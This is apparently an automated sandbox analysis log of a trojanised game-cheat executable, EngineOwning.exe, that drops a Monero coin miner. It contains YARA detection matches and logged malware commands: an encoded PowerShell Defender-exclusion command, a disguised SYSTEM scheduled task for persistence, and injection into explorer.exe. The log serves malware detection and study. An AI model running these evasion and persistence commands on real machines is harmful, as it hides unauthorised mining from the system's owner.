      Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.678879593.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.681018701.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.695452569.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.697578761.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.692061065.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000028.00000000.688605415.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: Process Memory Space: services86.exe PID: 6232, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: services86.exe PID: 6232, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: String function: 00007FF75AF76720 appears 46 times
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: String function: 00007FF75AF6F290 appears 121 times
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00401946 NtCreateThreadEx,
      Source: C:\Windows\System32\conhost.exeCode function: 36_2_00401986 NtWriteVirtualMemory,
      Source: servicesx86[1].exe.0.drStatic PE information: No import functions for PE file found
      Source: winrsdhost.exe.0.drStatic PE information: No import functions for PE file found
      Source: services86.exe.4.drStatic PE information: No import functions for PE file found
      Source: EngineOwning.exe, 00000000.00000000.492054431.0000018A2556A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000003.440565743.0000018A2556C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000000.491799996.0000018A25529000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000003.440469516.0000018A2556A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000003.438955057.0000018A25563000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000003.440325368.0000018A272EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exe, 00000000.00000003.440392224.0000018A25527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDfsrAdmin.exev+ vs EngineOwning.exe
      Source: EngineOwning.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\EngineOwning.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\servicesx86[1].exeJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@45/25@3/3
      Source: C:\ProgramData\winrsdhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: 7.0.mdsigstub.exe.2f0000.1.unpack, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 7.0.mdsigstub.exe.2f0000.1.unpack, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: mdsigstub.exe.0.dr, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: mdsigstub.exe.0.dr, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 7.0.mdsigstub.exe.2f0000.0.unpack, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 7.0.mdsigstub.exe.2f0000.0.unpack, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 7.2.mdsigstub.exe.2f0000.0.unpack, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 7.2.mdsigstub.exe.2f0000.0.unpack, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 7.0.mdsigstub.exe.2f0000.2.unpack, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 7.0.mdsigstub.exe.2f0000.2.unpack, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: Client[1].exe.0.dr, u0003u2001.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: Client[1].exe.0.dr, u0003u2001.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Users\user\Desktop\EngineOwning.exeCode function: 0_2_00007FF75AF76720 GetLastError,FormatMessageW,WideCharToMultiByte,_RTC_CheckStackVars,
      Source: EngineOwning.exeVirustotal: Detection: 24%
      Source: EngineOwning.exeReversingLabs: Detection: 19%
      Source: C:\Users\user\Desktop\EngineOwning.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\EngineOwning.exe "C:\Users\user\Desktop\EngineOwning.exe"
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\winrsdhost.exe C:/ProgramData/winrsdhost.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\mdsigstub.exe C:/ProgramData/mdsigstub.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7076 -s 1908
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\ProgramData\mdsigstub.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6436 -s 1072
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe"
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\services86.exe C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "pbsidfqjdbrp
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe
      Source: C:\Users\user\Desktop\EngineOwning.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\winrsdhost.exe C:/ProgramData/winrsdhost.exe
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\ProgramData\winrsdhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c "C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\mdsigstub.exe C:/ProgramData/mdsigstub.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\user\AppData\Roaming\Windows\services86.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\services86.exe C:\Users\user\AppData\Roaming\Windows\services86.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe zaxwujrpzpz0 NV/UX0XBuNRBWS1fF1Br++rCWld6jYh8EV4bO5NNvAb/5HIZwMhaD5NHJK5z9yNMjMMytH6YY4V55yfqWTQcp12cDSmlF6KKjp+Efu9KvL4SaXUjJ1+pbf+qj6k80A11p9RBq/ea7q4JQbAof6DO9w2NSwY2P/eQdDvkJvlXTHwvNMDMUjwmGA6FU/A9poINN+IS9cW53yukVYFD6Su/c8CqGYS4ifglLSM0j7mQykFqVEF0CjxSELaijRRGUV4pKZhHpb12LA0Vdcl7ekwOnt/zMSPiSwVay5rEBRJnuUFPIIktvItGKBK4ACGTOTqoPi0Hwp99GwYdY6hvlhzROvSxGFr63zNaVIZV1HL7mUPX5ICuxBxUgAURBxJcPcCDFtB6+YHcgebLsBjBHY6e778xlKAi+KMQhPPHAt2IhKnBuQNhYbkw20Qh4OsKyGjRuikRJY8g3TEE/RpYBkU2gM2pude0dusb3bcc6h3jJ8mqx1aqIvyYff4zch7WANZWOTWRwEz/LV6jXQrqAfeuV/LYITPX+2lLumdpKzFrcng=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A"
      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "pbsidfqjdbrp
      Source: C:\Users\user\Desktop\EngineOwning.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\ProgramData\winrsdhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
      Source: C:\Users\user\AppData\Roaming\Windows\services86.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%zaxwujrpzp%'
